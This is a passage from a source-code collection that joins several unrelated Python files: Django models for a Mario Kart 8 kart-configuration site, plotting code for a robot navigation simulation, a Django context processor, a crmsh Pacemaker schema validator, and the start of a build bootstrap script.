    stats = models.ForeignKey(CharacterStats)
    def file(self):
        """Return the static URL of this character's face image."""
        return static('images/mk8/faces/%s.png' % super(Character, self).file())
    class Meta:
        ordering = ['pk']
class KartConfig():
    """Stats for a complete kart configuration.

    Looks up the four chosen components and, when all exist, exposes each
    combined stat as an attribute (sum of the four components'
    contributions).  ``self.valid`` tells whether the lookup succeeded.
    """
    # every stat field declared on CommonStats / CharacterStats
    STAT_FIELDS = (
        'speed_ground', 'speed_water', 'speed_air', 'speed_antigravity',
        'acceleration', 'weight',
        'handling_ground', 'handling_water', 'handling_air',
        'handling_antigravity', 'traction', 'miniturbo',
    )
    def __init__(self, component_ids):
        """Create a config from a (character_id, kart_id, wheel_id, glider_id) tuple.

        Call-compatible with the old Python 2 tuple-parameter signature.
        """
        (character_id, kart_id, wheel_id, glider_id) = component_ids
        try:
            self.character = Character.objects.get(pk=character_id)
            self.kart = Kart.objects.get(pk=kart_id)
            self.wheel = Wheel.objects.get(pk=wheel_id)
            self.glider = Glider.objects.get(pk=glider_id)
        except ObjectDoesNotExist:
            # one of the ids was bogus; leave the stat attributes unset
            self.valid = False
            return
        self.valid = True
        # character stats live on the related CharacterStats row; the other
        # components carry their stats directly
        sources = (self.character.stats, self.kart, self.wheel, self.glider)
        for field in self.STAT_FIELDS:
            setattr(self, field, sum(getattr(src, field) for src in sources))
class ConfigList(models.Model):
    """A saved kart configuration list associated with a url hash."""
    # number of hex characters in the shareable url token
    URL_LENGTH = 5
    url = models.CharField(max_length=URL_LENGTH)
    create_ip = models.GenericIPAddressField(default='0.0.0.0')
    create_date = models.DateTimeField(auto_now_add=True)
    view_count = models.PositiveIntegerField(default=0)
    @classmethod
    def create(cls, request):
        """Initialize a ConfigList with visitor's IP and generated url hash."""
        ip = get_real_ip(request)
        if ip is None:
            ip = get_ip(request)
        if ip is None:
            # neither headers nor socket gave an address; store a marker value
            ip = '111.111.111.111'
        url = cls.generate_url(cls.URL_LENGTH)
        # renamed from `list`, which shadowed the builtin
        config_list = cls(url=url, create_ip=ip)
        logger.info('Adding ConfigList \'%s\' (%s)' % (url, ip))
        return config_list
    @staticmethod
    def generate_url(length):
        """Generate a url hash not yet used by any ConfigList."""
        while True:
            url_hash = uuid.uuid4().hex[0:length]
            try:
                ConfigList.objects.get(url=url_hash)
            except ObjectDoesNotExist:
                return url_hash
            # BUG FIX: on a collision the old code `break`-ed out of the loop
            # and implicitly returned None; keep drawing until a free hash
            # is found
    def __unicode__(self):
        """Display url hash to id mapping."""
        return '[\'%s\' -> %s]' % (self.url, self.id)
class ConfigListItem(models.Model):
    """A saved kart configuration associated with a ConfigList."""
    # NOTE: the field name 'list' shadows the builtin inside this class
    # body; kept as-is because it is part of the stored schema
    list = models.ForeignKey(ConfigList)
    character = models.ForeignKey(Character)
    kart = models.ForeignKey(Kart)
    wheel = models.ForeignKey(Wheel)
    glider = models.ForeignKey(Glider)
    @classmethod
    def create(cls, list, character, kart, wheel, glider):
        """Initialize ConfigListItem with default parameters order."""
        logger.info('Adding \'%s\' ConfigListItem [%s, %s, %s, %s]' %
                    (list.url, character, kart, wheel, glider))
        return cls(list=list, character=character, kart=kart, wheel=wheel, glider=glider)
    class Meta:
        # one row per distinct configuration within a list
        unique_together = ("list", "character", "kart", "wheel", "glider")
class KartRecord(models.Model):
    """A record of each anonymous kart configuration generated by users."""
    # The four selected components; one row is written per generated build.
    character = models.ForeignKey(Character)
    kart = models.ForeignKey(Kart)
    wheel = models.ForeignKey(Wheel)
    glider = models.ForeignKey(Glider)
    # Auditing: submitter address and creation timestamp.
    create_ip = models.GenericIPAddressField(default='0.0.0.0')
    create_date = models.DateTimeField(auto_now_add=True)
| dougwt/kartographer | kartographer/comparison/models.py | Python | gpl-2.0 | 8,723 |
from math import exp
import matplotlib
import matplotlib.pyplot as plt
from PIL import Image
import pickle
# Use Type-1/core fonts and TeX text rendering so saved PS/PDF figures
# embed fonts cleanly (publication-quality output).
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
def draw_map(img_dir):
    """Render the obstacles of a bitmap map as small black squares.

    Samples every 5th pixel (plus the final row/column), treats pixels whose
    red channel is 0 as obstacles, scales pixel coordinates by 0.02 m/px with
    the y axis flipped, saves the result to 'map.pdf' and returns the figure.
    """
    im = Image.open(img_dir)
    pix = im.load()
    Nx = im.size[0]
    Ny = im.size[1]
    scale = 0.02
    fig = plt.figure()
    ax = fig.add_subplot(111)
    # list(range(...)) so the '+ [Nx-1]' concatenation also works on
    # Python 3, where range() is no longer a list.
    for nx in list(range(0, Nx, 5)) + [Nx-1]:
        for ny in list(range(0, Ny, 5)) + [Ny-1]:
            if pix[nx, ny][0] == 0:
                ax.plot(nx*scale, (Ny-ny)*scale, color='k',
                        marker='s', markersize=1)
    ax.set_xlim([0, (Nx-1)*scale])
    plt.axis('off')
    plt.axis('equal')
    fig.tight_layout(pad=0)
    fig.savefig('map.pdf', bbox_inches='tight', pad_inches=0)
    return fig
def plot_traj(img_dir, A_robot_pose, A_control):
    # Render the recorded robot trajectory (sub-sampled every 5 frames) over
    # the bitmap map in two panels and save to 'traj_sim_2_zoom.pdf'.
    # Segment boundaries k1..k6 below are hand-tuned frame indices into the
    # recording; red segments mark human-in-the-loop (HIL) phases.
    # NOTE(review): Python 2 module ('print' statements, list+range concat,
    # integer division in the k1..k6 indices).
    robot_x = []
    robot_y = []
    hi_c = []
    sample = 5
    L = range(len(A_robot_pose)-1)
    for k in L[0::sample]:
        robot_pose = A_robot_pose[k]
        robot_x.append(robot_pose[1][0])
        robot_y.append(robot_pose[1][1])
        h_control = A_control[k][0]
        # Flag frames where the human exerted non-negligible control.
        if (abs(h_control[0])+abs(h_control[1]))>0.1:
            hi_c.append(1)
        else:
            hi_c.append(0)
    im = Image.open(img_dir)
    pix = im.load()
    Nx = im.size[0]
    Ny = im.size[1]
    scale = 0.02
    Ns = 2
    # plot map
    fig = plt.figure()
    ax1 = fig.add_subplot(121)
    for nx in range(0, Nx, Ns)+[Nx-1]:
        for ny in range(0, Ny, Ns)+[Ny-1]:
            if pix[nx,ny][0] == 0:
                ax1.plot(nx*scale, (Ny-ny)*scale, color='k',
                        marker='s', markersize=1)
    # plot pre hi
    print 'traj length', len(robot_x)
    k1 = [0, 180/sample] # initial
    k2 = [180/sample, 240/sample] #hi
    k3 = [240/sample,1110/sample] # normal
    k4 = [1100/sample, 1200/sample] #hi
    k5 = [1200/sample, 2100/sample] #update
    k6 = [2100/sample, 2450/sample] #temp
    ax1.plot(robot_x[k1[0]:k1[1]], robot_y[k1[0]:k1[1]], color='b',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=2)
    ax1.plot(robot_x[k2[0]:k2[1]], robot_y[k2[0]:k2[1]], color='r',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=7, label=r'HIL')
    ax1.plot(robot_x[k3[0]:k3[1]], robot_y[k3[0]:k3[1]], color='b',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=5, label=r'$\tau_r^0$')
    #---------- print regions of interest
    # Regions of interest: (x, y, half-width) squares labelled r_*/c_*.
    ap = ['r_0', 'r_1', 'r_2',
          'r_3', 'r_4', 'r_5',
          'r_6', 'r_7', 'r_8',
          'c_1', 'c_2', 'c_3',
          'c_4']
    roi = [(2.5, 1.5, 0.5), (8.5, 0.5, 0.5), (12.5, 1.5, 0.5),
           (17.5, 1.5, 0.5), (8.5, 4.5, 0.5), (14.5, 4.5, 0.5),
           (18.5, 4.5, 0.5), (3.0, 8.0, 0.7), (11.5, 8.5, 0.5),
           (2.0, 6.0, 1.0), (11.0, 4.0, 1.0), (17.0, 4.0, 0.7),
           (8.0, 7.0, 1.0),
           ]
    for k in range(len(roi)):
        reg = roi[k]
        rec = matplotlib.patches.Rectangle((reg[0]-reg[2], reg[1]-reg[2]), reg[2]*2, reg[2]*2, fill = True, facecolor = 'cyan', edgecolor = 'black', linewidth = 1, alpha =0.8)
        ax1.add_patch(rec)
        ax1.text(reg[0], reg[1]-0.1, r'$%s$' %ap[k], fontsize = 20, fontweight = 'bold', zorder = 3)
    ax1.legend(ncol=1,bbox_to_anchor=(0.78,0.56),loc='lower left', borderpad=0.1, labelspacing=0.2, columnspacing= 0.3, numpoints=3, prop={'size': 10})
    ax1.grid()
    ax1.set_xlim([0,(Nx-1)*scale])
    ax1.axis('off')
    ax1.axis('equal')
    #==============================
    # Right panel: same map, later phases (HIL, updated plan, temporary task).
    ax2 = fig.add_subplot(122)
    for nx in range(0, Nx, Ns)+[Nx-1]:
        for ny in range(0, Ny, Ns)+[Ny-1]:
            if pix[nx,ny][0] == 0:
                ax2.plot(nx*scale, (Ny-ny)*scale, color='k',
                        marker='s', markersize=1)
    # plot pre hi
    print 'traj length', len(robot_x)
    k1 = [0, 100/sample] # initial
    k2 = [100/sample, 250/sample] #hi
    k3 = [250/sample,1110/sample] # normal
    k4 = [1100/sample, 1200/sample] #hi
    k5 = [1200/sample, 2110/sample] #update
    k6 = [2100/sample, 2390/sample] #temp
    ax2.plot(robot_x[k4[0]:k4[1]], robot_y[k4[0]:k4[1]], color='r',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=6, label=r'HIL')
    ax2.plot(robot_x[k5[0]:k5[1]], robot_y[k5[0]:k5[1]], color='g',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=5, label=r'$\tau_r^t$')
    ax2.plot(robot_x[k6[0]:k6[1]], robot_y[k6[0]:k6[1]], color='m',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=7, label=r'$\varphi_{\textup{temp}}$')
    ax2.plot(robot_x[(k6[1]-10):], robot_y[(k6[1]-10):], color='g',
             linestyle='-',linewidth=2, marker='o', mfc='grey',
             fillstyle='full', markersize=2.3, zorder=5)
    #---------- print regions of interest
    ap = ['r_0', 'r_1', 'r_2',
          'r_3', 'r_4', 'r_5',
          'r_6', 'r_7', 'r_8',
          'c_1', 'c_2', 'c_3',
          'c_4']
    roi = [(2.5, 1.5, 0.5), (8.5, 0.5, 0.5), (12.5, 1.5, 0.5),
           (17.5, 1.5, 0.5), (8.5, 4.5, 0.5), (14.5, 4.5, 0.5),
           (18.5, 4.5, 0.5), (3.0, 8.0, 0.7), (11.5, 8.5, 0.5),
           (2.0, 6.0, 1.0), (11.0, 4.0, 1.0), (17.0, 4.0, 0.7),
           (8.0, 7.0, 1.0),
           ]
    for k in range(len(roi)):
        reg = roi[k]
        rec = matplotlib.patches.Rectangle((reg[0]-reg[2], reg[1]-reg[2]), reg[2]*2, reg[2]*2, fill = True, facecolor = 'cyan', edgecolor = 'black', linewidth = 1, alpha =0.8)
        ax2.add_patch(rec)
        ax2.text(reg[0], reg[1]-0.1, r'$%s$' %ap[k], fontsize = 20, fontweight = 'bold', zorder = 3)
    ax2.legend(ncol=1,bbox_to_anchor=(0.78,0.56),loc='lower left', borderpad=0.1, labelspacing=0.1, columnspacing= 0.1, numpoints=3, prop={'size': 7.8})
    ax2.grid()
    ax2.set_xlim([0,(Nx-1)*scale])
    ax2.axis('off')
    ax2.axis('equal')
    fig.tight_layout(pad=0)
    fig.savefig('traj_sim_2_zoom.pdf',bbox_inches='tight', pad_inches=0)
def plot_control(A_control):
    """Plot the commanded linear velocities over time and save the figure.

    A_control is a sequence of [tele_control, navi_control, mix_control]
    triples, each control being a (v, omega) pair: tele_* is the human
    operator's command, navi_* the planner's, and mix_* the blended command
    actually applied.  The plot is written to 'sim_control_v_2.pdf'.
    """
    # Split the recorded triples into per-source linear/angular series.
    c_linear = []
    c_angular = []
    h_linear = []
    h_angular = []
    m_linear = []
    m_angular = []
    for tele_control, navi_control, mix_control in A_control:
        c_linear.append(navi_control[0])
        c_angular.append(navi_control[1])
        h_linear.append(tele_control[0])
        h_angular.append(tele_control[1])
        m_linear.append(mix_control[0])
        m_angular.append(mix_control[1])
    # One recorded sample per time step of 1.0 s.
    step = 1.0
    T = [t*step for t in range(len(A_control))]
    fig = plt.figure(figsize=(10,3))
    ax = fig.add_subplot(111)
    # Dashed: the two input commands; solid black: the mixed output.
    ax.plot(T, c_linear, linestyle='--', linewidth=2.0,
            color='blue', label=r'$u_r[v]$', zorder=3)
    ax.plot(T, h_linear, linestyle='--', linewidth=2.0,
            color='red', label=r'$u_h[v]$', zorder=4)
    ax.plot(T, m_linear, linestyle='-', linewidth=2.0,
            color='black', label=r'$u[v]$', zorder=2)
    ax.legend(ncol=3, loc='upper left', borderpad=0.1,
              labelspacing=0.2, columnspacing=0.5)
    ax.grid()
    ax.set_xlabel(r'$t(s)$')
    ax.set_ylabel(r'$v(m/s)$')
    ax.set_xlim(0, step*(len(A_control)))
    ax.set_ylim(-0.5, 1.1)
    plt.savefig(r'sim_control_v_2.pdf', bbox_inches = 'tight')
def plot_beta(A_beta):
    """Plot the per-iteration beta values and save to 'sim_beta_2.pdf'."""
    fig = plt.figure(figsize=(10,5))
    ax = fig.add_subplot(111)
    iterations = range(len(A_beta))
    ax.plot(iterations, A_beta, color='b', linestyle='-', linewidth=5,
            marker='o', mfc='r', fillstyle='full', markersize=6, zorder=2)
    ax.set_xlabel(r'$Iteration$')
    ax.set_ylabel(r'$\beta_k$')
    ax.set_xlim(0, len(A_beta))
    ax.set_ylim(0, 12)
    ax.grid()
    plt.savefig(r'sim_beta_2.pdf', bbox_inches = 'tight')
if __name__ == "__main__":
    # Load the recorded simulation run (poses, control triples, beta history)
    # and regenerate the trajectory figure.  The other plots are kept
    # commented for manual one-off use.
    A_robot_pose, A_control, A_beta = pickle.load(open('tiago_sim_case_two.p', 'rb'))
    # draw_map('map.png')
    plot_traj('map.png', A_robot_pose, A_control)
    # plot_control(A_control)
    # plot_beta(A_beta[0])
    # print A_beta[0]
| MengGuo/mix_initiative | utilities/map/vis_sim.py | Python | gpl-2.0 | 12,697 |
from django.contrib.auth.forms import AuthenticationForm
from django.core.urlresolvers import reverse
from actstream.models import user_stream
from dnstorm.app import DNSTORM_URL
from dnstorm.app.utils import get_option
from dnstorm.app.models import Problem, Idea
from dnstorm.app.utils import get_option
def base(request):
    """
    Provides basic variables used for all templates.
    """
    context = {}
    context['dnstorm_url'] = DNSTORM_URL
    # Links
    if not context.get('site_title', None):
        context['site_title'] = '%s | %s' % (
            get_option('site_title'), get_option('site_description'))
    context['site_url'] = get_option('site_url')
    context['login_form'] = AuthenticationForm()
    # Only append a ?next= redirect when the request does not already
    # carry one.
    if 'next' in request.GET:
        context['login_url'] = ''
        context['logout_url'] = ''
    else:
        context['login_url'] = reverse('login') + '?next=' + request.build_absolute_uri()
        context['logout_url'] = reverse('logout') + '?next=' + request.build_absolute_uri()
    # Checks
    context['is_update'] = 'update' in request.resolver_match.url_name
    # Activity
    if request.user.is_authenticated():
        context['user_activity'] = user_stream(request.user, with_user_activity=True)
        context['user_activity_counter'] = get_option('user_%d_activity_counter' % request.user.id)
    else:
        context['user_activity'] = None
        context['user_activity_counter'] = None
    return context
| vmassuchetto/dnstorm | dnstorm/app/context_processors.py | Python | gpl-2.0 | 1,367 |
# Copyright (C) 2009 Yan Gao <ygao@novell.com>
# See COPYING for license information.
import os
import tempfile
import copy
from lxml import etree
class PacemakerError(Exception):
    '''Base error raised for schema retrieval, parsing and validation failures.'''
def get_validate_name(cib_elem):
    """Return the CIB element's 'validate-with' attribute, or None."""
    if cib_elem is None:
        return None
    return cib_elem.get("validate-with")
def get_validate_type(cib_elem):
    """Schema type is always Relax-NG here, regardless of the CIB element."""
    return "rng"
def get_schema_filename(validate_name):
    """Append the '.rng' suffix to the schema name unless already present."""
    if validate_name.endswith('.rng'):
        return validate_name
    return "%s.rng" % (validate_name)
def read_schema_local(validate_name, file_path):
    """Read and return the contents of a schema file from the local disk.

    validate_name is unused here; it is part of the get_schema_fn(name, path)
    signature shared with alternative fetchers.  Raises PacemakerError when
    the file cannot be read.
    """
    try:
        with open(file_path) as f:
            return f.read()
    # 'except E as name' is valid on Python 2.6+ and required on Python 3;
    # the previous 'except IOError, msg' form is Python-2-only syntax.
    except IOError as msg:
        raise PacemakerError("Cannot read schema file '%s': %s" % (file_path, msg))
def delete_dir(dir_path):
    """Recursively remove dir_path, ignoring failures on individual entries.

    Refuses to operate on the filesystem root.  The final rmdir of dir_path
    itself is NOT suppressed, so a non-empty leftover still raises OSError.
    """
    real_path = os.path.realpath(dir_path)
    # A path made up entirely of separators (e.g. "/") is the root.
    if real_path.count(os.sep) == len(real_path):
        raise PacemakerError("Do not delete the root directory")
    # Bottom-up walk: files first, then the (now empty) subdirectories.
    for root, dirs, files in os.walk(dir_path, False):
        for entry in files:
            try:
                os.unlink(os.path.join(root, entry))
            except OSError:
                pass
        for entry in dirs:
            try:
                os.rmdir(os.path.join(root, entry))
            except OSError:
                pass
    os.rmdir(dir_path)
def subset_select(sub_set, optional):
    """Filter helper for attribute/element listings.

    'r' keeps required entries only, 'o' keeps optional ones only, and any
    other subset code keeps everything.
    """
    return {'r': not optional, 'o': optional}.get(sub_set, True)
def CrmSchema(cib_elem, local_dir, is_local=True, get_schema_fn=None):
    """Factory returning the schema implementation for a CIB element.

    Generalized to forward the optional is_local/get_schema_fn arguments that
    RngSchema accepts; the defaults preserve the previous behaviour exactly.
    """
    return RngSchema(cib_elem, local_dir, is_local=is_local,
                     get_schema_fn=get_schema_fn)
class Schema(object):
    """Base class for CIB schema handling.

    Tracks the schema named by a CIB element's 'validate-with' attribute and
    validates CIB documents against it.  Schema parsing/lookup is provided by
    subclasses (see RngSchema).  NOTE: Python 2 module ('except E, msg'
    syntax, 0644 octal literal).
    """
    # Name of the currently active schema (from 'validate-with').
    validate_name = None
    def __init__(self, cib_elem, local_dir, is_local=True, get_schema_fn=None):
        # get_schema_fn(validate_name, path) -> schema text; defaults to
        # reading from the local filesystem.
        self.is_local = is_local
        if get_schema_fn is not None:
            self.get_schema_fn = get_schema_fn
        else:
            self.get_schema_fn = read_schema_local
        self.local_dir = local_dir
        # NOTE(review): refresh() (via update_schema in subclasses) populates
        # schema_filename and schema_str_docs, yet both are re-initialised
        # just below -- these two assignments look like they were meant to
        # precede refresh(); confirm against upstream before relying on the
        # object's state right after construction.
        self.refresh(cib_elem)
        self.schema_str_docs = {}
        self.schema_filename = None
    def update_schema(self):
        'defined in subclasses'
        raise NotImplementedError
    def find_elem(self, elem_name):
        'defined in subclasses'
        raise NotImplementedError
    def refresh(self, cib_elem):
        # Re-read 'validate-with'; only rebuild the schema when it changed.
        saved_validate_name = self.validate_name
        self.validate_name = get_validate_name(cib_elem)
        self.schema_filename = get_schema_filename(self.validate_name)
        if self.validate_name != saved_validate_name:
            return self.update_schema()
    def validate_cib(self, new_cib_elem):
        # Validate a CIB element tree; returns (is_valid, detail_msg) where
        # detail_msg concatenates the Relax-NG error log on failure.
        detail_msg = ""
        if self.is_local:
            schema_f = os.path.join(self.local_dir, self.schema_filename)
        else:
            # Remote schemas are first materialised into a temp directory.
            try:
                tmp_f = self.tmp_schema_f()
            except EnvironmentError, msg:
                raise PacemakerError("Cannot expand the Relax-NG schema: " + str(msg))
            if tmp_f is None:
                raise PacemakerError("Cannot expand the Relax-NG schema")
            else:
                schema_f = tmp_f
        # Round-trip through serialisation to get a detached copy for lxml.
        try:
            cib_elem = etree.fromstring(etree.tostring(new_cib_elem))
        except etree.Error, msg:
            raise PacemakerError("Failed to parse the CIB XML: " + str(msg))
        try:
            schema = etree.RelaxNG(file=schema_f)
        except etree.Error, msg:
            raise PacemakerError("Failed to parse the Relax-NG schema: " + str(msg))
        #try:
        #    schema.assertValid(cib_elem)
        #except etree.DocumentInvalid, err_msg:
        #    print err_msg
        #    print schema.error_log
        try:
            etree.clear_error_log()
        except:
            pass
        is_valid = schema.validate(cib_elem)
        if not is_valid:
            for error_entry in schema.error_log:
                detail_msg += error_entry.level_name + ": " + error_entry.message + "\n"
        if not self.is_local:
            # Best-effort cleanup of the expanded temp schema directory.
            try:
                delete_dir(os.path.dirname(tmp_f))
            except:
                pass
        return (is_valid, detail_msg)
    def tmp_schema_f(self):
        # Write all cached schema documents into a fresh temp directory and
        # return the path of the main schema file (None if it is missing).
        tmp_dir = tempfile.mkdtemp()
        for schema_doc_name in self.schema_str_docs:
            schema_doc_filename = os.path.join(tmp_dir, schema_doc_name)
            fd = os.open(schema_doc_filename, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0644)
            schema_doc_str = self.schema_str_docs[schema_doc_name]
            os.write(fd, schema_doc_str)
            os.close(fd)
        if self.schema_filename in self.schema_str_docs:
            return os.path.join(tmp_dir, self.schema_filename)
        else:
            return None
    def get_sub_elems_by_obj(self, obj, sub_set='a'):
        '''defined in subclasses'''
        raise NotImplementedError
    def get_elem_attrs_by_obj(self, obj, sub_set='a'):
        '''defined in subclasses'''
        raise NotImplementedError
    # sub_set: 'a'(all), 'r'(required), 'o'(optional)
    def get_elem_attrs(self, elem_name, sub_set='a'):
        elem_obj = self.find_elem(elem_name)
        if elem_obj is None:
            return None
        return self.get_elem_attrs_by_obj(elem_obj, sub_set)
    # sub_set: 'a'(all), 'r'(required), 'o'(optional)
    def get_sub_elems(self, elem_name, sub_set='a'):
        elem_obj = self.find_elem(elem_name)
        if elem_obj is None:
            return None
        return self.get_sub_elems_by_obj(elem_obj, sub_set)
    def supported_rsc_types(self):
        # Resource types are the child elements allowed under <resources>.
        return self.get_sub_elems("resources")
def get_local_tag(el):
    """Strip the default-namespace prefix ('{uri}') from an element's tag."""
    ns_prefix = "{%s}" % el.nsmap[None]
    return el.tag.replace(ns_prefix, "")
class RngSchema(Schema):
    """Relax-NG implementation of Schema.

    Loads the grammar named by 'validate-with' (recursively following
    externalRef includes) and answers queries about which elements and
    attributes a given element admits.  Sub-node results are lists of the
    form [(grammar, node), wrapper, wrapper...], where trailing wrappers
    record enclosing <optional>/<zeroOrMore>/... declarations.
    NOTE: Python 2 module ('except Exception, msg', basestring).
    """
    # XPath matching any descendant with the given local name, ignoring
    # namespaces.
    expr = '//*[local-name() = $name]'
    def __init__(self, cib_elem, local_dir, is_local=True, get_schema_fn=None):
        # file name -> (grammar root, <start> node); filled by update_schema.
        self.rng_docs = {}
        Schema.__init__(self, cib_elem, local_dir, is_local=is_local, get_schema_fn=get_schema_fn)
    def update_schema(self):
        # Rebuild all cached grammars for the current validate_name.
        self.rng_docs = {}
        self.schema_str_docs = {}
        self.update_rng_docs(self.validate_name, self.schema_filename)
        return True
    def update_rng_docs(self, validate_name="", file=""):
        # Load 'file' and recurse into any externalRef documents not yet seen.
        self.rng_docs[file] = self.find_start_rng_node(validate_name, file)
        if self.rng_docs[file] is None:
            return
        for extern_ref in self.rng_docs[file][0].xpath(self.expr, name="externalRef"):
            href_value = extern_ref.get("href")
            if self.rng_docs.get(href_value) is None:
                self.update_rng_docs(validate_name, href_value)
    def find_start_rng_node(self, validate_name="", file=""):
        # Fetch + parse one grammar document; returns (grammar, start node).
        schema_info = validate_name + " " + file
        crm_schema = self.get_schema_fn(validate_name,
                                        os.path.join(self.local_dir, file))
        if not crm_schema:
            raise PacemakerError("Cannot get the Relax-NG schema: " + schema_info)
        self.schema_str_docs[file] = crm_schema
        try:
            grammar = etree.fromstring(crm_schema)
        except Exception, msg:
            raise PacemakerError("Failed to parse the Relax-NG schema: " + str(msg) + schema_info)
        start_nodes = grammar.xpath(self.expr, name="start")
        if len(start_nodes) > 0:
            start_node = start_nodes[0]
            return (grammar, start_node)
        else:
            raise PacemakerError("Cannot find the start in the Relax-NG schema: " + schema_info)
    def find_in_grammar(self, grammar, node, name):
        # First <node name="name"> occurrence in the grammar, or None.
        for elem_node in grammar.xpath(self.expr, name=node):
            if elem_node.get("name") == name:
                return elem_node
        return None
    def find_elem(self, elem_name):
        # Search every loaded grammar for <element name="elem_name">.
        elem_node = None
        for (grammar, start_node) in self.rng_docs.values():
            elem_node = self.find_in_grammar(grammar, 'element', elem_name)
            if elem_node is not None:
                return (grammar, elem_node)
        return None
    def rng_xpath(self, xpath, namespaces=None):
        # Evaluate an xpath against each loaded grammar; list of result sets.
        return [grammar.xpath(xpath, namespaces=namespaces)
                for grammar, _ in self.rng_docs.values()]
    def get_sub_rng_nodes(self, grammar, rng_node):
        # Flatten rng_node's children, resolving ref/externalRef indirection
        # and recording wrapper declarations (optional, choice, ...) after
        # the (grammar, node) head of each result.
        sub_rng_nodes = []
        for child_node in rng_node.iterchildren():
            if not isinstance(child_node.tag, basestring):
                continue
            local_tag = get_local_tag(child_node)
            if local_tag == "ref":
                def_node = self.find_in_grammar(grammar, 'define', child_node.get('name'))
                if def_node is not None:
                    sub_rng_nodes.extend(self.get_sub_rng_nodes(grammar, def_node))
            elif local_tag == "externalRef":
                nodes = self.get_sub_rng_nodes(*self.rng_docs[child_node.get("href")])
                sub_rng_nodes.extend(nodes)
            elif local_tag in ["element", "attribute", "value", "data", "text"]:
                sub_rng_nodes.append([(grammar, child_node)])
            elif local_tag in ["interleave", "optional", "zeroOrMore",
                               "choice", "group", "oneOrMore"]:
                nodes = self.get_sub_rng_nodes(grammar, child_node)
                for node in nodes:
                    node.append(copy.deepcopy(child_node))
                sub_rng_nodes.extend(nodes)
        return sub_rng_nodes
    def sorted_sub_rng_nodes_by_name(self, obj_type):
        # Like sorted_sub_rng_nodes_by_node, addressed by element name.
        rng_node = self.find_elem(obj_type)
        if rng_node is None or rng_node[1] is None:
            return None
        return self.sorted_sub_rng_nodes_by_node(*rng_node)
    def sorted_sub_rng_nodes_by_node(self, grammar, rng_node):
        # Group flattened sub-nodes by their local tag name.
        sub_rng_nodes = self.get_sub_rng_nodes(grammar, rng_node)
        sorted_nodes = {}
        for sub_rng_node in sub_rng_nodes:
            name = get_local_tag(sub_rng_node[0][1])
            if sorted_nodes.get(name) is None:
                sorted_nodes[name] = []
            sorted_nodes[name].append(sub_rng_node)
        return sorted_nodes
    def get_elem_attr_objs(self, obj_type):
        return self.sorted_sub_rng_nodes_by_name(obj_type).get("attribute", [])
    def get_sub_elem_objs(self, obj_type):
        return self.sorted_sub_rng_nodes_by_name(obj_type).get("element", [])
    def find_decl(self, rng_node, name, first=True):
        # Negative index of a wrapper declaration 'name' in the node's
        # trailing wrapper list; 0 when absent.
        decl_node_index = 0
        for decl_node in rng_node[1:]:
            if get_local_tag(decl_node) == name:
                decl_node_index = rng_node.index(decl_node) - len(rng_node)
                if first:
                    break
        return decl_node_index
    def get_sorted_decl_nodes(self, decl_nodes_list, decl_type):
        sorted_nodes = []
        for rng_nodes in decl_nodes_list:
            rng_node = rng_nodes.get(decl_type)
            if rng_node is not None and rng_node not in sorted_nodes:
                sorted_nodes.append(rng_node)
        return sorted_nodes
    def get_obj_name(self, rng_node):
        return rng_node[0][1].get("name")
    def get_attr_type(self, attr_rng_node):
        # Type of an attribute's first <data> child (e.g. "integer"), or None.
        sub_rng_nodes = self.sorted_sub_rng_nodes_by_node(*attr_rng_node[0])
        for sub_rng_node in sub_rng_nodes.get("data", []):
            return sub_rng_nodes["data"][0][0][1].get("type")
        return None
    def get_attr_values(self, attr_rng_node):
        # Enumerated <value> texts allowed for the attribute.
        attr_values = []
        sub_rng_nodes = self.sorted_sub_rng_nodes_by_node(*attr_rng_node[0])
        for sub_rng_node in sub_rng_nodes.get("value", []):
            #print etree.tostring(sub_rng_node[0][1])
            #print sub_rng_node[0][1].text
            #attr_values.append(sub_rng_node[0][1].getchildren()[0].data)
            attr_values.append(sub_rng_node[0][1].text)
        return attr_values
    def get_attr_default(self, attr_rng_node):
        return attr_rng_node[0][1].get("ann:defaultValue")
    def _get_by_obj(self, rng_obj, typ, sub_set):
        """
        Used to select attributes or elements based on
        sub_set selector and optionality.
        typ: 'attribute' or 'element'
        sub_set: 'a'(all), 'r'(required), 'o'(optional)
        """
        grammar, rng_node = rng_obj
        if rng_node is None:
            return None
        selected = []
        sub_rng_nodes = self.get_sub_rng_nodes(grammar, rng_node)
        for node in sub_rng_nodes:
            head = node[0][1]
            if get_local_tag(head) != typ:
                continue
            name = head.get("name")
            if selected.count(name):
                continue
            # the complicated case: 'choice'
            #if self.find_decl(sub_rng_node, "choice") != 0:
            optional = any(self.find_decl(node, opt) != 0
                           for opt in ("optional", "zeroOrMore"))
            if subset_select(sub_set, optional):
                selected.append(name)
        return selected
    def get_elem_attrs_by_obj(self, rng_obj, sub_set='a'):
        "sub_set: 'a'(all), 'r'(required), 'o'(optional)"
        return self._get_by_obj(rng_obj, 'attribute', sub_set=sub_set)
    def get_sub_elems_by_obj(self, rng_obj, sub_set='a'):
        "sub_set: 'a'(all), 'r'(required), 'o'(optional)"
        return self._get_by_obj(rng_obj, 'element', sub_set=sub_set)
| aspiers/crmsh | modules/pacemaker.py | Python | gpl-2.0 | 13,248 |
import sys
import click
import os
import subprocess
from packageinfo import BUILD, VERSION, NAME
# Refuse to run outside an OpenFOAM environment: sourcing edmenv.sh exports
# WM_PROJECT, which we use as a sentinel.
if "WM_PROJECT" not in os.environ:
    print("To run this command you must source edmenv.sh first")
    sys.exit(1)
# The version of the buildcommon to checkout.
BUILDCOMMONS_VERSION="v0.1"
def bootstrap_devenv():
    """Create the .devenv scratch directory and make sure buildrecipes-common
    is checked out inside it at the pinned version."""
    try:
        os.makedirs(".devenv")
    except OSError:
        # Directory already exists; nothing to do.
        pass
    checkout_dir = ".devenv/buildrecipes-common"
    if not os.path.exists(checkout_dir):
        clone_command = [
            "git", "clone", "-b", BUILDCOMMONS_VERSION,
            "http://github.com/simphony/buildrecipes-common.git",
            checkout_dir,
